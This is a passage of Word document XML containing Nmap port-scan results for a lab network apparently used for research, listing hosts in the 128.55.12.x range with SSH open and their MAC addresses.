        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:58 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A4E12" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6961BCE9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-3-dp (128.55.12.109)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65993592" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A916B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8CA1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE8265" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:59 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D1795" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022EA67E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-target-1-dp (128.55.12.110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B5F0CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.077s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E42885" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F32F56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BD8D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:60 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AD82B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF3D391" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-target-2-dp (128.55.12.111)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11085BBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B41105" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD987F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D03C5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:61 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8C249" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41321FB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-analysis-dp (128.55.12.112)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF7AE56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7E093" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F3E3F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423BE5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:62 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B00EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6F69B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-replay-adapt-1-dp (128.55.12.113)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36DD8E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE6F25" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AC120" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFA491" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:63 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F493481" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46700CEF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ACFF05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0469F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21621981" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79383D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:64 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F55DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3D4FEE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-replay-marple-1-dp (128.55.12.115)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51303F17" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F14932" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91D5F6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA0D32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:65 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868EDF0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7CE18E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE60ED4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3B9CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BBEB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F889B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:66 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC88943" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4698FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-trace-1-dp (128.55.12.117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65683751" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1EFF9B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240CDB4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B20378D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 10:98:36:AF:D0:58 (Dell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFFE8CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D92CC60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-trace-2-dp (128.55.12.118)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B758CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD61605" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17B972" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C323F87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 10:98:36:AF:CF:14 (Dell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBBF436" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B94911D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-target-3-dp (128.55.12.119)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FC2AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C4915" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC6333" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D767AAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:69 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D7FA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292677EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.121</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D334D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.071s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EADA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A783363" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10582965" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:71 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2138C5A9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A03A031" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18252955" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.025s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF57D3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C93177" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027B66B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:72 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53205511" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6C5E2C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-translate-3-dp (128.55.12.123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65852A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B28B87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F89C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75083B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:73 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9AC14" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DB63CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-marple-3-dp (128.55.12.124)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48902535" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF04083" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7CEC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F3DB44" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:74 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402FA408" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB4A90F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6A2B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CAFC7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD03DC8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF0F59" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:75 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CC689" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3963B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-trace-3-dp (128.55.12.126)</w:t>
      </w:r>
    </w:p>
